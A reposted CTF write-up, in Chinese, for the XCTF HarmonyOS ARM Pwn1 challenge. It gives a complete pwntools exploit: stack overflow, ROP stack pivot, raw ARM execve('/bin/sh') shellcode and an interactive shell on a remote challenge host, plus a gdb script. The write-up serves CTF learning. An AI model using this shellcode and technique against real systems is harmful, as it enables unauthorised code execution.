6
XCTF华为鸿蒙专场 ARM Pwn1
source link: https://xuanxuanblingbling.github.io/ctf/pwn/2020/12/29/arm/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
XCTF华为鸿蒙专场 ARM Pwn1
发表于 2020-12-29
| 分类于 CTF/Pwn
栈溢出,ARM题目的一般环境是QEMU用户态,默认不支持NX,故直接ROP+栈迁移然后写shellcode即可。
from pwn import *
context(arch='arm',os='linux',log_level='debug')
#io = process(["qemu-arm","-g","1234","-L",".","./bin"])
#io = process(["qemu-arm","-L",".","./bin"])
io = remote("139.159.210.220",9999)
shellcode = b'\x02\x20\x42\xe0\x1c\x30\x8f\xe2'
shellcode += b'\x04\x30\x8d\xe5\x08\x20\x8d\xe5'
shellcode += b'\x13\x02\xa0\xe1\x07\x20\xc3\xe5'
shellcode += b'\x04\x30\x8f\xe2\x04\x10\x8d\xe2'
shellcode += b'\x01\x20\xc3\xe5\x0b\x0b\x90\xef'
shellcode += b'/bin/sh;'
pop_r3_pc = 0x00010348
data_addr = 0x00021030
read_addr = 0x000104E8
payload = b'a'*256+p32(data_addr)+p32(pop_r3_pc)+p32(data_addr)+p32(read_addr)
io.sendafter("input: ",payload);sleep(0.1)
io.sendline(p32(data_addr+4)+shellcode)
io.interactive()
gdb脚本:
file bin
set architecture arm
b * 0x00010500
b * 0x000104F4
target remote :1234
其他WP都是用通用gadget做的(我还不会…感觉对于qemu题麻烦了,还要泄露libc啥的,而且exp中立即数太多,看着迷糊:
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK